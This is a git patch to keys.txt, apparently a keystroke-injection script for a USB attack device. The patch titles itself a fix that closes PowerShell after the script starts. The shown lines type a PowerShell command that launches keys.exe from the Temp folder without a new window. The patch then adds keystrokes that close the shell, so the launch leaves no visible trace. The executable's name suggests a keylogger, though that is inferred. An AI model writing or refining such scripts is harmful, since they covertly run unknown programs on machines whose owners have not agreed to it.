From 647ece6a43b605b118bd789f71c47fd7cf7bee8c Mon Sep 17 00:00:00 2001 From: Daniel Svitan Date: Tue, 25 Mar 2025 21:03:23 +0100 Subject: [PATCH] :bug: Closes powershell after script starts --- keys.txt | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/keys.txt b/keys.txt index 850840f..2c23e78 100644 --- a/keys.txt +++ b/keys.txt @@ -13,3 +13,7 @@ RUN client.exe file STRING Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow ENTER DELAY 1000 + +RUN close powershell +STRING exit +ENTER